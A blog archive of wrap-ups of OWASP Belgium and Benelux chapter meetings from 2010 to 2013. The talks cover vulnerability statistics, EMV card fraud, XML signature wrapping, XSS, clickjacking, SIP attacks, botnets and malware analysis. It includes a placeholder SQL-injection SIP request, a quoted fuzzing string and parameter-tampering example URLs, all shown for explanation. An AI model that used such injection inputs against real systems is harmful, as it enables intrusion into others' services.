Tag Archives: Owasp

OWASP Belgium Chapter Wrap-Up March 2013

March 5, 2013 23:01 | 9 Comments |

IMG 2979

Here is a quick wrap-up of the first OWASP Belgium Chapter meeting of 2013 organised today in Leuven. SecAppDev is running this week so it was a good opportunity to bring some trainers for an evening meet up: Yves Younan and Steven Murdoch. Lieven, from the OWASP team, made a small review of the current Belgium chapter & projects. The room was full of (new) people. There was so many attendees that the organisers had to do a last minute switch to a bigger room! That’s very good, seeing old friends is always nice but new faces are always welcome. OWASP has so many important messages to broadcast to people. If you never attended such event, please do the next time… and its free!

The first speaker, Yves, is Security Researcher at SourceFire and talked about “25 years of vulnerabilities“. To perform this research, Yves had a look at main vulnerabilities databases like CVE & NVD. The goal was to build an overview of the vulnerabilities reported during the past years and, based on that, if we could expect some trends for the coming years. Since vulnerabilities are indexed (in 1988), 54.000 vulnerabilities have been reported. Some statistics were give by Yves based on two level of criticity: the serious vulnerabilities (CVSS >= 7) and the critical ones (CVSS = 10). This scoring is based on multiple factors like remotely exploitable, affecting the data integrity, availability, etc. Note that if not enough data is provided, the vulnerability will be by default classified as critical. This is a safe behaviour, if you don’t know your enemy, expect the worst. Since 1988, there was clearly a trend as seen in the picture below but less vulnerabilities were tagged as “serious” (33% in 2012). 9.16% have been tagged as “critical” in 2012. Vulnerabilities are classified by types:

  • Authentication
  • Credential management
  • Access control
  • Buffer errors (overflow)
  • CRSF
  • XSS

Most important (in terms of occurrence) were buffer overflow, XSS and Access control. Top-3 serious vulnerabilities: Buffer overflow, SQL injection & code injection. For critical vulnerabilities: Buffer overflow, “not-enough-info” and access control. And what about our best friends, the security vendors? Top-10 vendors account for 14K vulnerabilities but we must keep in mind that some vendors have a lot of products in their catalog. The top-3 in numbers was Microsoft, Apple & Oracle. Serious top-3 was: Microsoft, Apple, Cisco and critical was: HP, IBM & Mozilla. BTW, it’s pretty sure that Oracle will grab some positions in 2013.

IMG 2982

About the products:

  • In numbers: Firefox, MacOS X, Chrome
  • Serious: Microsoft XP, Firefox, Chrome
  • Critical: Firefox, Thunderbird, Seamonkey.

Note that some products share a lot of code, think about FIrefox & Thunderbird (both are developed by Mozilla). What about Linux? Redhat is the winner followed by Suse & Gentoo. And for Microsoft, winners are Windows XP, Server 2003 and Server 2000. Of course, for a few years, mobiles phones also suffer of vulnerabilities. In this scope, Apple is the winner with its iPhone which counts 81% of the mobile vulnerabilities. This looks strange because there are much more malwares for Android. Then Yves explained the methodology used to try to count 0-day vulnerabilities for Microsoft products. How? If a CVE is published before a Microsoft Security Bulletin, this can be considered as a 0-day. Results? In most cases, Microsoft communicates before a CVE being assigned. Only 13% could be considered as 0-days vulnerabilities.

And what is the situation today? (statistics on a period from 1st January to 14th February) The type “not-enough-info” comes in first place. Buffer overflows remain in 2nd position. And who’s the top vendor? Guess who? Oracle of course with the multiple Java vulnerabilities reported in the last weeks. Finally, Yves tried to give some prediction about the future. For him, buffer overflows will remain a very important type of vulnerability. Access control and privileges issues will grow. At vendors level, Oracle will remain in 1st position and Google will probably enter the top-10.

Some conclusions to this research? Fewer vulnerabilities were reported in 2012 but the percentage  of critical ones increased by the next two years, so the trend will continue! If you would like to read more about this topic, the full report is available here. The talk was not technical and was only based on vulnerability databases. I would expect more facts.  Usually, I don’t have a lot of time to read such reports with plenty of statistics and this presentation was a great opportunity to review the report content. Maybe a last tip: Check out regularly sites like CVE, NVD or OSVDB to get updated with new vulnerabilities.

After a small break, Steven, Senior Researcher at University of Cambridge, talked about a hot topic: the security in banking applications. In UK, “Chip & Pin” is available for five years now (based on the EMV standard). It’s convenient: the user put his card in a reader and give his pin. UK was a very early adaptor (2006) of this system. The goal of EMV was to reduce drastically the fraud. Did it succeed? This is not sure. Steven reviewed some statistics about fraud and some types even grew like counterfeit fraud. Techniques exploit backwards compatibility issues. Indeed, the old magstrip can still be used as a “failover” because upgrade to Chip & Pin was very complex and expensive to be performed in one step!

IMG 2983

Counterfeit fraud increased again after the deployment of EMV. It was easier to collect PIN at POS instead of ATM. Attackers try to find the weakest link. Online banking started in 2009 and is growing. The responabilitiy of some fraud shifted from the merchant to the customer. Another fact: PoS (“Point of Sale“) terminals are difficult to harden compared to regular ATM. Steven gave deep information about the vulnerability discovered by his University.

Then he talked about the “no-PIN attack“: It allows criminals to use a stolen card without knowing the PIN. To achieve this, you need a device between the genuine card and the reader. This is some kind of MiTM attack. A demo was even performed for the UK television:

This was three years ago! And today, what’s the situation? Well, according to Steven, nothing changed a lot. Cards issued by  some banks work and others not. Why was this attack possible? Because EMV is complex, it uses a bad design of flags exchanged between the card/reader and implementation has problems. For the banks, it’s just a matter of risks: based on the number of transactions, banks could take the risk to face some fraudulent events. Finally, the latest type of fraud which is still growing in UK was reviewed: Phishing & key loggers. Steven presented the different types of devices/controls used to authorise the transactions like more or less complex CPATCHA’s, TAN or DigiPass but most of them have also issues.

Steven’s conclusion: EMV systems are open to a variety of attacks. Their complexity is problematic. There is a lack of resistance measures implemented and customers are still left liable. Today for online banking, transaction authentication is essential which requires a trustworthy display. The research is available here. Compared to the first one, this presentation was very technical. Maybe a little too much for me who has no experience in this field.

Posted in: Belgium, Event, Security | Tagged: , , ,

OWASP Belgium Chapter September 2012 Wrap-Up

September 12, 2012 21:42 | Leave a Comment |

Steven Van Acker on stage

The holidays are gone, kids are back to school. For the security landscape, it means that security meetings are also back! The first OWASP Belgium Chapter was organised tonight. Here is my quick wrap-up.

This time the meeting started in the afternoon with a technical workshop organised by SPION. Due to agenda conflicts, I did not attend this one. I joined the meeting for the second part organised in a classic format: after a brief introduction with news about the Chapter and the OWASP foundation in general, two speakers came to present their researches.

The first one was Steven Van Acker who talked about remote JavaScript inclusions. They are plenty of publicly available JavaScript libraries on the Internet. It’s very easy for developers to do some shopping and use them without reinventing the wheel. Steven presented the results of a research about  the usage of those libraries in websites. Is it really safe to use them “as is“? Always keep in mind that browsers don’t care about what they execute. A crawler was developed to download websites content from the Internet (approximatively 3.3M URLS where visited) and included JavaScript content was extracted. Steven gave some statistics. The one which hit me was about the top-10 of JavaScript code used: 50% of this top-10 is related to Google services! (mainly Google Analytics) Once we saw the amount of JavaScript code included in websites, some questions arise:

  • Should websites trust remote providers?
  • Can we safely execute their code?
  • What’s the quality of their maintenance?

Then, again based on the finding, some weirdness:

  • Cross-user scripting (ex: http://localhost/script.js)
  • Cross-network scripting (ex: http://192.168.2.1/script.js)
  • Stale IP-based remote inclusions
  • State domain-based remote inclusions
  • Typo-squatting XSS
This last example was really weird. They found some sites trying to load JavaScript content from googlesyndicatio.com (with a missing “n”). What they did? They registered the domain and got hits! That’s an easy way to compromise websites. And what about the countermeasures? Steven gave two:
  • Executing the remote scripts in a sandbox (not always easy).
  • Download the script locally.
If the second one looks interesting, it could make difficult to implement. It’s do-able only if the files do not change often. A very nice presentation with clear explanations.
After a short break and pizzas, the second speaker for tonight was Dave van Stein. He talked about “modern information gathering” or how to grab interesting data from your targets event without sending any packet to them. The talk was a brief presentation of techniques and tools used by pentesters or auditors to collect information. Here is a short list of tools covered by Dave:
  • shodanhq.com
  • serversniff.net
  • robtex.com (with a good domain visualisation feature)
  • Google advanced searches (intent:, inurl:, filetype:, etc)
  • Google Hacking DB
  • Search engine optimisation tools (can crawl target websites for you)
  • FOCA
  • Maltego

Most of them are classic ones. But that was a good reminder or a good way to populate your bookmarks! That was a good meeting to start the new season!

Posted in: Belgium, Event, Security | Tagged: , , ,

March 2012 OWASP Belgium Chapter Meeting Wrap-Up

March 6, 2012 23:41 | Leave a Comment |

Jim on StageTonight was already organized the second OWASP Belgium Chapter meeting of this year. Two great (should I say “as usual”?) speakers were invited: Ken van Wyk and Jim Manico. Jim already talked during a chapter meeting last year and I was happy to see it back in our small country. After the classic OWASP news and updates provided by Seba, Ken started the evening with a presentation about “Common iOS Pitfalls vs. OWASP’s iGoat“.

Read More →

Posted in: Belgium, Event, Security | Tagged: , , ,

First 2012 OWASP Belgium Chapter Meeting Wrap-Up

January 25, 2012 23:58 | Leave a Comment |

OWASP Belgium AttendeesA new year started and why change good habits? I’m just back from the first OWASP Belgium Chapter meeting of 2012. Here is my quick wrap-up. The organization remains the same, the first few minutes were dedicated to some news from the OWASP organization given by Seba. A survey was organized by the Belgium chapter about the attendees and their expectations. Some results were presented. Most part of the members define their knowledge between “security aware” and “experienced“. Good news, lot of people are ready to participate and submit talk ideas! What’s on their wishlist for 2012? Mobile security, HTML5, SDLC, SAP and more demos/hands-on sessions. One recommendation for this year: more interaction between the chapter meetings (via forums, mailing lists?).

Read More →

Posted in: Belgium, Event, Security | Tagged: , , ,

OWASP Benelux Days 2011 Wrap Up

December 3, 2011 18:49 | 3 Comments |

OWASP VenueThe OWASP Benelux Days is a two-days event organized by three OWASP chapters (Belgium, Netherlands and Luxembourg). The 2010 edition was organized in Eindhoven(NL). This year, it was organized in Luxembourg. After a safe trip, sharing my car with a friend, we arrived at the Luxembourg University. Nice venue with all the facilities to make your life easier: nice room with enough power plugs for everybody, good Wi-Fi, coffee. The catering was also excellent (that’s also important! ;-) )

The first day was dedicated to a training provided by Eoin Keary about “Secure Application Development“. 96 people attended the training, that’s not bad! When Eoin asked how many people are developers, hands raised up. When he asked who’s performing “secure programming“, much less hands raised. This proves that security is not yet in most developers’ mind. My feedback about the first day is a bit mitigated. First, the original training length is two days, difficult to review all the topics within one day, splides were reviewed very quickly. The morning was very “static”. Classic attacks and counter measures were reviewed. The afternoon was dedicated to live examples of attacks against a vulnerable website using BurpSuite. Bad point here, the Wi-Fi or the victim server were not properly sized and frequent timeouts made the exercises difficult to perform.

OWASP Training Room

After the training, Professor Yves Le Traon came to talk about “Security Testing“. It’s a fact: Security testing must be promoted inside your organization! I liked the quote from A. Petrenko:

In God we trust, for the rest we test

Think about this! After an introduction about the testing concepts, more focus was given on XSS attacks and its XSS testing framework. A copy of slides about security testing is available here. Very interesting presentation. The day ended with a social event organized in the center of Luxembourg at Agua de Côco. Nice people, nice conversations.

Agua de Côco

The second day started with a presentation of the “Interdiscipliny Center for Security, Reliability & Trust” (securityandtrust.lu) and some news about the OWASP foundation. Did you know that OWASP already turned ten years? The foundation was created in December 2001. Happy Birthday OWASP! And it’s amazing to review the job performed since the creation. Some numbers:

  • 15000 downloads per month
  • 30000 unique visitors per month
  • 2 millions hits per month
  • 140 projects in 3 main areas: protect, detect, life cycle
  • 220 chapters / 100 active ones

For easier administration and events organization, OWASP europe has been created in June 2011. What are the goals for 2012? Build the OWASP platform, expand communication channels, grow the community and financial stability (because money remains a key element everywhere). A very quote grabbed from a slide:

You can’t improve what you can’t measure

The rest of the day was dedicated to presentation covering several interesting topics. First, Brenno de Winter, a well-know ICT journalist in the Netherlands, presented a talk called “From Diginotar to Leaktober“. This was not a talk but more a story. Brenno came back on the Diginotar story, without any slides support.

Brenno de Winter

This was my preferred presentation! What happened with Diginotar, why was Dutch public authorities affected by the attack, the crisis which followed. Very interesting. A good question from the audience: “Was the bad communication from authorities due to incompetence or something else?” Brenno’s answer: “Maybe both of them, they didn’t know how to handle this!”. This sounds like a good resume. Following this story, a Dutch web site decided to organize “Leaktober” event to prove that no data are safe!

After a coffee break, Justin Clarke talked about “Practical crypto attacks against web applications“. We need cryptography to keep the CIA (Confidentiality, Integrity, Availability). Based on a .Net demo website Justin showed that implementing encryption is good but must be performed in the right way. Otherwise it can be easily broken. Nice live demos were performed. The last one was how to get a configuration file from an application using weak encryption (based on the vulnerability describe in Microsoft Security Bulletin MS10-070).

Andrey Belenko presented his research about the iOS operating system with a talk called “Overcoming iOS data protection to re-enable iPhone forensics“. Forensics operations are based on three steps: Acquisition, analysis and reporting. But modern mobile operating systems prevent this by implementation security features like: password protection, key-chain, storage encryption. Andrey deeply reviewed all the security features implemented by Apple. How encryption is performed, how are managed/stored keys. Lot of interesting stuff for people who are facing issues with iPhones, iPads devices.

Koen Vanderloock came to present: “SIMBA – guarding your applications“. Leader of this OWASP project (“Security Integration Module for Business Applications“), he explained its purpose, the features, the futre and how to implement it within your application. Basically, the goal of SIMBA is to simplify the “User Access Management“. Why reinvent the wheel? (and take risks of bugs, bad-implementation). If you have to manage users, roles, access in your application, please have a look first at SIMBA. All the required information is available on simbasecurity.org.

Ludovic Petit came to speak about the legal aspects of development. His talk, called “Do you … legal?” explained what are the current legal aspect of computer crime in Europe. As a developer (or manger), if you manage data, you are legally responsible of them. Directors can be responsible for offenses committed by their organization simply because they failed to adequately, exercise their duty of care (A legal person must be responsible) and consequences can be enormous:

  • Financial
  • Reputation
  • Prosecution

The OWASP foundation as also a legal project in 2008: The OWASP Secure Software Contract Annex. It could be interesting to have a look at it. Keep also in mind: “Security as a service and … trust as a business“.

Trust

During Ludovic’s presentation, I read a good remark by a friend on Twitter:

#owaspbnl11 legal obligations presentation. But how many companies are prosecuted if they don’t protect datas ? None !

That’s true! Thierry Zoller presented “The rise of the vulnerability market“. The basic of his talk: constantly monitoring the threat landscape. Targeted attacks are on the rise, hacktivists became very popular. First they are different classes of attackers:

  • Opportunists (script kiddies)
  • Targeting opportunists (hacktivists)
  • Targeted (digital mercenaries)
  • State founded (apt, espionage).

Those can be represented like a pyramid (more victims are targeted more the surface attack is reduced)

Attackers Classes

Thierry also explained very well the standard vulnerability life cycle (discovery ->notification -> disclosure -> patch avail -> patch installed)  and the associated risks (pre-disclosure risks, post-disclosure and post-patch risks). The vulnerability markets also evolved:

  • From 95-2004, it was the fun times)
  • Mid-2000 commercial (vendors were informed / public disclosure and a patch available)
  • Late 2000, the “black market” was created
  • Today, vendors are not informed, user are not informed, no patches avail.

There is a huge business today around the vulnerabilities. Companies are selling services (Secunia, VUPEN, ExploitHub). Others sell commercial exploits framework (CoreImpact). The landscape changed completely. Thierry’s concluded that the importance of skill as a factor to measure attacker sophistication decreased. What increased? The motivation, funding and hence sophistication. Just a remark about the latest slides: they were really commercial and din’t have a reason in a conference like OWASP. But this did not change my conclusion about the talk: very good analyze!

Jean-Marc Bost & Sébastien Bischof presented “The limits of eBanking“. eBanking are very complex web applications and, for a while, became also a nice target. Event if banks try to increase the security, Jean-Marc and Sébastien explained how attackers can still steal your money! First, some stats: Trojans are a realty (5% of Windows PC are infected (source: Microsoft) and 25% are affected by trojans (source: Pandalabs). About the timeline of attacks:

  • 2006 (Citibank – MitM attack)
  • 2007 (Malware in the browser)
  • Today: MI (“malware inside“) with malwares like Spy Eye or Zeus.

eBanking Trojan

Modern trojans are very complex and professional. Very difficult to detect. Example given by Jean-Marc: some of them not only inject Firefox but also the Firefox Crash Reporter to prevent disclosure of info to Mozilla! Sébastien performed a live demo which hided the Firefox process and started a rogue Browser. The main problem is, once rogue code injected into the browser, you cannot trust the display. As a conclusion, don’t forget this: WYSIWYS (“What you see is what you sign.“)

Sasha Rommelfangen, working for the CIRCL, talked about “Dynamic malware analysis – or: the ~five deadly (anti-) venoms“. I was a bit afraid while I read the conference program. This will be a presentation with slides full of assembler code. In fact, not at all! Sasha’s presentation was excellent! When you’ve to analyze a malware, they are some essential questions:

  • Who’s behind the attack?
  • What was the motivation? Usual cyber criminal would like to get money, governments are looking for intelligence/sabotage and hacktivists “for the lulz”
  • What does the malware do? Understanding changes on the system, network activity This is a necessary step for removal
  • Why should you be concerned? It might compromise servers/data centers!

There are two methods to analyze a malware. First the static analysis. It’s looking at a file and concluding about run-time behavior without running it (memory check, disassemble). What are the limitations? Packers, obfuscated code, encryption etc. The UNIX command ‘strings’ is sometimes a good start (look for interesting words like “shell“, “getf” or “putf“, etc). Dynamic analysis is much more interesting: The goal is to run the malware in a controlled environment. What are the problems? Most malwares have anti-vm checks, anti-debugging, turing’s halting problem. To perform dynamic analyzis, you first have to build your (safe) environment to be able to listen to the network, to fake network services like DNS and to accept/record all traffic on all ports. Sometimes malware are present in Office documents. I learned about a very interesting tool called OfficeMalScanner which finds shell codes in documents and extract them to build executable. Finally, the Microsoft SysInternals tools remain a classic in every analyst’s toolbox.

Last but not least, Lieven Desmet gave some results about his research on “HTML5 security“. Third-party JavaScript is present everywhere (examples: advertisements, gateway to social networks, services tracking) via scripts inclusion or iframe tags (not the same origin policy).  Lieven explained the methodology and scope of the research and of course some results The full report is available here.

That’s all for this edition! What else? There was a CTF organized the second day, the winner received a free ticket for AppSec EU 2012. Write in your agenda right now: The next edition will be held in Belgium in Leuven (KUL) around beginning of December 2012. See you there!

Posted in: Event, Security | Tagged: , , ,

June ’11 OWASP Belgium Meeting Wrap-up

June 16, 2011 12:02 | Leave a Comment |

OWASP AppSensor ProjectBack from the latest OWASP Belgium Chapter meeting… Two speakers were scheduled tonight: Colin Watson presented the OWASP AppSensor project then Andreas Falkenberg talked about modern attacks against web services like Twitter. A last-minute guest joined us: Josh Corman who spoke about “rugged software“.

What’s new at OWASP? First OWASP European Foundation is now live! The list of ongoing projects keeps growing. At the moment, 155 projects split in three categories: Protection, detection and life-cycle.

Amongst this huge list,  one of them is called AppSensor. It can be briefly described as follows:

The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. Current efforts are underway to create the AppSensor tool which can be utilized by any existing application interested in adding detection and response capabilities.

Colin, a leader of this project, explained the foundation of AppSensor: patterns for logging, architecture and signaling. Today, attackers are not script kiddies anymore but motivated hackers. They spend a lot of time to find vulnerabilities and try to exploit them.  AppSensor can protect you against those attacks. Two important questions to ask yourself:

  • Is your application under attack?
  • Have an unknown vulnerability been exploited today?

Your answer will probably be “I don’t know“. Colin gave three test cases:

  • Stepping trough a process in the wrong order (ex: http://url/step4 then http://url/step2)
  • Requesting an unauthorized resource identifier (ex: http://url?id=1004 then http://url?id=1008)
  • Payment transfer exceed limit (ex: http://url?amount=10000000)

Typically, web infrastructures are protected by four conventional defenses:

  • TLS / SSL
  • Firewalls
  • Deep Packets Inspection
  • Web Application Firewalls

The problem? Most of them won’t block the test cases! Classic WAF’s rely on generic protection (based on patterns) but do not follow the application requirements. So, how to perform a proper attack detection? It must be:

  • Integrated – understand the application
  • Effective
  • Scalable

We need active defenses based on:

  • Event Detection
  • Event Analyze
  • Event Determination
  • Response selection
  • Response execution.

The detection point can be achieved at several points like data input, access control, requests, authentication, file input/output, user trend, system trend, reputation, encoding, command injection, etc.

How to implement AppSensor into your applications?

  • What are the new project requirements
  • Retrofitting existing apps
  • Preliminary requirements
    • Logging
    • Risk assessment
    • Secure coding (nothing new!)
  • Monitoring & tuning

Note that proper logging is mandatory! Using a correct signaling method (Colin mentioned CEF & CEE but other can be used). AppSensor proposes 50 different detection points and more than a dozen of response actions like session reset, user or IP blacklist, speed reduction etc. Colin showed a demo, the dashboard looks impressive. But, by talking with some developers, the same question always came back: How to integrate AppSensor in an efficient way into your applications?

Colin @ OWASP

After a short break, Andreas presented a new type of attacks. Web Services (“WS“) are more and more used everywhere today to manage applications, devices. Examples of users? Amazon, BMW (for communications with suppliers), military organizations (NATO, DoD). All of them are nice targets!

Andreas started his presentation with a definition of Web Services and the underlying technologies. Web Services are “an array of technologies and standards to implement remote procedure calls (RPC’s)“. Below, we found the following technologies:

  • WSDL files (they define what operations are offered and how to reach them)
  • SOAP protocol (used to send WS messages in XML over HTTP(S))

What are the security features of SOAP?

  • XML encryption of an arbitrary part of a message
  • XML signature of an arbitrary part of a message

The way of SOAP requests are processed is important to understand to conduct attacks. What kind of attacks are they vulnerable?

  • All classical web applications attacks (XSS, SQL in, …)
  • But lot of new specific attacks like “Signature Wrapping Attack

Andreas gave a first example of a basic SOAP request without security features enabled. The example was a message sent to a e-commerce portal with a shipping address. He showed how it is easy to change the delivery address. The second example was based on a messages containing a signed body (the signature is based on a regular PKI). Again, easy to move the signed body to an alternative place in the XML and create a new one with the fake data. This showed a major problem with the signature of XML files: it does not specify where the signed data are located! To conduct an attack, prerequisites  are just a valid signed SOAP messages which can be easily found by sniffing some traffic, reading logfiles, contacting evil employees or just be reading forums!

The next example explained an Advanced Sign Wrapping Attack against a nice service: Twitter. The social network is hosted by a major cloud provided. This is not Twitter which is vulnerable but the cloud provider itself: The Twitter backend is available via Web Services messages. In this case, SOAP messages contained an expiration time stamp. Hélas, this information can also be hidden and the messages became forever valid. The vulnerability is based on the malformed XML message which contained more than one body. How is this possible? Just due to performance reasons! The XML schema validation is simply not performed. Here is another example of vulnerability.

What countermeasures are available to protect against this type of attacks?

  • Strict server side security policy
  • XML schema validation
  • Use “see what is signed” approach
  • Apply “XML signature best practice” by W3C

How to detect if your infrastructure is vulnerable? If it is not designed to resist against this attack, you are! For more information about Web Services attacks, have a look at ws-attacks.org.

Andreas @ OWASP

Finally, last minute a last minute speaker joined us. Josh Corman presented some slides and good ideas about “rugged software”. The first message was: We are doing it wrong! Can we compare software to a building? A building is made of concrete and steel and we can rely on it. What about software? We can’t rely on them even if they are fully part of our daily life. We need to implement security but business people hate it: it’s very expensive and prevent them to do what they want.

Here is a small survival guide:

  • Defensible infrastructure
  • Operational discipline
  • Situational awareness
  • Countermeasures

This was a “turbo” talk but lot of interesting ideas. Feel free to visit ruggedsoftware.org for more info.

Josh @ OWASP

Posted in: Uncategorized | Tagged: , , , ,

May 2011 OWASP/ISSA Belgium Meeting Wrap-up

May 23, 2011 23:40 | Leave a Comment |

Jim Manico @ OWASPTonight was held a joined OWASP and ISSA Belgium Chapters meeting with three speakers. Very interesting content, here is a small wrap-up in “bullet-point” mode due to a lack of free time…

First speaker, Tom Van Der Mussele from Verizon Business spoke about the “non-conventional attacks“. Tom explained that those types of attacks are difficult or impossible to be picked up by your favorite web scanners (Example: Nikto). Such tools expect more data like error codes or specific output to trigger alerts. Why? It’s difficult for them to know the difference between authorized and unauthorized data sets (Example: sent to two different users). Expecting a HTTP return code “200″ is not enough. More and more applications use XML streams for dynamic data querying and look like a real fat client program like Google Calendar. The goal of such attacks is to escape the content of this specific end-user (the XML streams are interpreted by the end-user browser). How to achieve the attacks? By analyzing the structure of the XML sheet when performing input manipulation, cookie modification or by playing with meta-data like the user-agent. The classic scanner will try to replace value by funny stuff like “’1>0–” but it can be very funny to replace the values by something other (fuzzing). Tom gave some examples of badly written web application which were front-end to legacy applications. It was easy to bypass the front-end by sending an unexpected key code like a function key. To resume his talk, there is no way to automate tests on modern web application. Main tools are an intercepting proxy like WebScarab (another OWASP project) and your brain! ;-)

The second speaker was Jim Manico: “The Ghost of XSS past, present and future“. Jim is an active member of the OWASP foundation and, amongst other projects, he’s the official OWASP Podcast editor. Jim is pushing for a participation of everybody into OWASP:

We are doing bad and OWASP is good! It’s free and your can learn a lot of security stuff. If you don’t collaborate, you’re stupid!

The message is clear. He started his presentation with a brief history of the XSS attacks then came to the conclusion that they will remain classic in the future. Why? Most web pages became more complex and attacks will become more difficult to solve. Classic methods to block XSS are sometimes irrelevant. Example, the characters < ‘ ” or & are sometimes used for “regular” purpose. If you block single quotes in your e-commerce application, you’ll loose all your Irish customers! The situation today:

  • Untrusted data must be canonized
  • Untrusted data must be validated
  • Untrusted data mist be contextually sanitized/encoded

Then, Jim presented some frameworks to get rid of XSS attacks by auto-escaping template technologies:

  • XHP from Facebook
  • Context Sensitive Auto-Sanitization (CSAS) from Google
  • Java XMT Template (JXT) from OWASP

The major trade-off for developers:  They need to write highly compliant templates! Another protection is the usage of sandboxes:

At browser level, security can be increased by using the “Content Security Policy” which can be enabled by using the response header “X-Content-Security-Policy“. Jim is a developer and talked to developers. Not being one, some ideas were sometimes difficult to follow for me. If you are interested, Jim’s slides about the same topic are available here.

Finally, Christian Van Heurck introduced the Belgian CERT (CERT.be). This organization has two roles: reactive and proactive. They are the “Fire brigade of the internet” and are performing incident handling like the recent issue with dns.be. The Belgian CERT is in contact with other CERT worldwide and Christian insisted on the trusted relation established between all those organizations. To increase communications efficiency, it’s mandatory to meet and know the people. The best way remains to have some beers! :-) It’s important to share the information. About the tools, they are some already in place like abusehelper.be (to automate process the incident notifications). But other projects are in the pipe to increase collaborations (no more details as I don’t know there official status).

Posted in: Belgium, Event, Security | Tagged: , , , ,

OWASP BeNeLux Day 2010 Wrap Up

December 3, 2010 08:49 | 1 Comment |

OWASP KitYesterday, the three OWASP Benelux chapters organized together their annual OWASP BeNeLux day. This edition was held at the Fontys Hogeschool in Eindhoven (NL). First detail of this year, the weather conditions! After more than three hours of driving on snowy roads, I finally reached Eindhoven. Just in time for a coffee and to connect to the WiFi before the talks.

The event started with a welcome word by the local Netherlands chapter and by Seba Deleersnyder (from the Belgium chapter), who reviewed the status of some projects amongst the  huge amount currently in the pipe. In a few words:

  • New risk based OWASP Top-10
  • New testing guide and code review guide (v4). Release in the beginning of 2011?
  • OWASP numbering system
  • pythonsecurity.org
  • New mobile group started
  • Improving the browser security with Mozilla
  • OWASP O2 platform
  • Modsecurity CRS (“Core Rule Set“).

The complete list of those projects (122!) is available here.

The first speaker was Marco Balduzzi from Eurecom. He talked about the “Clickjacking” attack. In a few months, the name “ClickJacking” became very popular. The number of hits returned by Google keeps growing but is it really a threat or a buzz? This is a real type of attack: Marco reviewed the “Twitter Bomb” attack which generates self-replicating Twitter messages by abusing some HTML/CSS features. But what is the coverage of such attacks on the Internet? To track them, Marco built an automated system based on browser scenarios. To replicate the user behavior, he uses the X.org libraries to move the mouse, generate clicks. The browser is protected by NoScript & ClickIDS (to reduce the risk of false positives). He scanned an initial set of 70K URLs and generated more than one million of Internet pages using a cluster of 10 Linux VMs (at a rate of 15K pages/day). The results? 37% of pages contained iFrames but only 0.16% of transparent iFrames. Only two (2!) real attacks were detected. Marco’s conclusion is that ClickJacking attacks really exists but are not the preferred method used by malicious guys. Finally, he reviewed some mitigations techniques like the X-FRAME-OPTIONS.

Radu State, from the University of Luxembourg, made an excellent talk about “Owning networks via VoIP and web attacks“. Normally, VoIP is not in the OWASP scope but Radu explained how to conduct web attacks through SIP devices. The presentation started with examples of common attacks against SIP phones. Most of them are vulnerable to attacks, often just be sending a single packet! The worst case is the one against the China’s Grandtouch phones which can be easily switched into “spy mode” (is it a bug or a feature?). To search for SIP vulnerabilities, Radu uses a fuzzer called KIF. The second part focused on ways to use SIP devices to perform SQL injections and XSS attacks. Example:

  INVITE sip:<sqlinjection>@PBX

SIP was renamed by Radu as “UFBP” or “Universal Firewall Bypass Protocol“. Indeed, SIP is often allowed through firewalls without any further inspection and SIP proxies are available from the Internet. Another issue with IP phones: they are considered by users as “just a phone” but it’s a computer. They also embed web servers and this is the attack vector. Even if your phones are connected on a dedicated VLAN, the users will access them via their browser on the internal LAN. Some demos (videos) showed how to create a user in the VoIP system, how to redirect the user to malicious sites or perform network reconnaissance. A great talk!

Just before the lunch, Matias Madou presented “Finding back-doors in code“. This was the same talks as the one presented during BruCON in September. Matias explained why software have back-doors, what are the motivations of insiders (gain, vengeance) and what type of the different types of back-doors found in the code (with examples). Then, he reviewed methods and techniques to analyze the code and find them.

Thierry Zoller presented “How to NOT implement a Payback/Cashback” system. Thierry described what are the “Payback” systems and why they are so popular.

“In marketing generally and in retailing more specifically, a loyalty card, rewards card, points card, advantage card or club card is a plastic or paper card, visually similar to a credit card or debit card, that identifies the card holder as a member in a loyalty program. Loyalty cards are a system of the loyalty business model. In the United Kingdom it is typically called a loyalty card, in Canada a rewards card or a points card, and in the United States either a discount card, a club card or a rewards card. Cards typically have a barcode or magstripe that can be easily scanned, and some are even chip cards. Small keyring cards (also known as keytags) which serve as key fobs are often used for convenience in carrying and ease of access.” (Source: wikipedia.org)

Then he reviewed the weaknesses of a specific system massively deployed. Upon Thierry’s request, no more information will be disclosed here.

Next talk was about “Botnets / Bredolab”, presented by Michael Sandee. He started with a generic introduction about botnets. They receive more and more attention from medias and lead to hot debates. Bredolab is the name of a piece of malware (called “BManager“). Bredolab is in fact available for sale and generate a lot of different botnets. Michael explained how they are deployed and how they are managed to generate huge amount of money. Good cybercrime review!

Nick Nikiforakis discussed about the privacy of file sharing services. Those services are common today (You certainly already uploaded a file to Rapidshare). If you take care of your privacy, select your file sharing service wisely! Nick explained how most of those services work. No surprise, they are cloud based and suffer of the common cloud weaknesses: unknown physical locations, privacy but also availability. A cloud environment can also suffer of data loss (examples: Amazon EC2 in 2007 or Microsoft and the T-Mobile Sidekick data in 2009). Back to the file sharing services, they are very easy to use: just upload and share the URL returned by the service. But how are generated those URLs? Rick analyzed height well-known services. He uploaded several times the same file in a short interval and tried to find how they generated the returned tokens. File sharing services protect themselves trough obscurity (files can be accessed only by their ID). Really? Most generated keys are predictable. If you have an initial valid token, you can enumerate the whole database of files. Rick tried that via a script and get.. too much data to be analyzed manually! Amongst the grabbed files, he found: death certificates, bank statements, company budgets & salaries, medical transcriptions (often file sharing services are used by translation services). Once you get the information, you just use it to conduct regular attacks (espionage, mailing, racket, etc). To conclude: take care when choosing your file sharing service. Always encrypt the file content and delete it once shared with your peers. For companies, it could be a good idea to restrict them.

Chen Gour-Arie talked about “The social networking corporate threat” or what are the threat added by social networks in corporate environments. They are used by “internal” users but organizations also use them as a communication channel. Chen gave some figures, threats and how to penetrate an organization using social network. What are the risks?

  • Information leakage
  • Social engineering
  • network infiltration
  • Application layer attack

The path is always the same: study -> approach -> attack. Via a demo video,  he explained how to exploit a corporate environment in less then 7 mins!

Finally, Walter Belgers presented “Attacking is easy, defending is hard“. Working as a defender, you have to find ALL the weaknesses of an infrastructure. From the attacker perspective, one is enough! The weak spots are the applications, the users, the physical access (ex: a shared collocation). Walter reviewed the common problems when a physical access to the device is possible. He also explained best practices with softwares: you do not only need to install a software, you need to configured it (hardening) properly. Too much application are installed with default settings (Scada products are a good bad example). How to protect? By using multiple lines of defense, by logging and monitoring everything (detection) and by having a plan ready (reaction). Users education (awareness) is also mandatory. How will users react to this:

Credit Card Check

The day ended with the CTF results and acknowledgements. Book already the following event: 30rd November – 1st December 2011 in Luxembourg. Great organization by OWASP!

Posted in: Event, Security, Websites | Tagged: , ,

